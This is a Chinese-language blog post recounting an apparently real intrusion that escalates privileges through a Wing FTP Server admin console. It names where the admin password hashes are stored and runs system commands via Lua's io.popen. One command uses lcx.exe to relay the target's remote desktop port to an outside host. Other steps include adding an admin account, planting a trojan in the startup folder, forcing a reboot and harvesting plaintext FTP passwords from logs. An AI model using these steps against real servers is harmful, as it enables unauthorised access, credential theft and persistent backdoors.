注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

wing ftp提权  

2015-01-21 14:03:52|  分类: 提权 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
前面发帖求助基友wing ftp提权,得到了基友anlfi 的热心支援,最后虽然成功提权,但中间还是有很多东西不明白的,希望有其它基友补充。
    wing ftp的默认管理端口是5466,wing ftp利用lua脚本能执行一些系统命令,lua执行主要是用os.execute和io.popen两个函数,这两个函数的具体差别请百度。
   我们在渗透中,首先想法获取到wing ftp的管理员账号密码,它的密码在wing ftp的安装目录下的data/_ADMINISTRATOR/admin.xml里,md5加密,能不能解开就看人品了,其它用户也都能在里面找到 md5密文。然后可以登录后台,使用“超级管理员--控制台--lua脚本”来执行系统命令
wing ftp提权 - IversOn5 - IversOn5 blog
 
   这里只能一条一条的执行,我在渗透中是想到命令写到一个Bat或者vbs中然后去用lua脚本一次执行这个bat或vbs,结果发现执行不了bat或vbs脚本,直接去执行一个远控马也没成功,不知道是什么原因,望基友们补充。
   我在渗透中,虽然添加了管理员账号,但目标的远程桌面端口是需要转发,我用lua脚本执行的io.popen('c:\log\lcx.exe -slave 1.1.1.1 8888 127.0.0.1 3389'),第一次是成功了,后面弄死个人都不行,不知道是什么原因,可能是杀软或防火墙的原因。
   后面我那个气啊,就直接来了点暴力的,添加了一个ftp账号对C盘写入,丢马到启动项,然后用io.popen('shutdown /r /t 00')重启服务器。
   
   wing ftp还可以通过计划任务来执行脚本,效果跟前面差不多,有些版本可能不支持计划任务。
wing ftp提权 - IversOn5 - IversOn5 blog
 

  在渗透中,多看看wing ftp超级管理员在“安装目录/log/admin/”下的日志,你会有许多惊喜,比如看到一些ftp账号的明文密码或者超管执行的一些命令,我在这次渗 透中就是通过日志发现了目标的ftp密码,但在登录的时候发现登录不上,密码也是正确的,最后才知道是因为这个ftp用户的密码已经过期了,这也让我纠结 了很久才发现的,哎~
wing ftp提权 - IversOn5 - IversOn5 blog
 
  我还试过msf的wing ftp远程执行命令的exp,本地测试没返回结果,而且会有大量日志,就没在目标上使用。
  评论这张
 
阅读(38)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017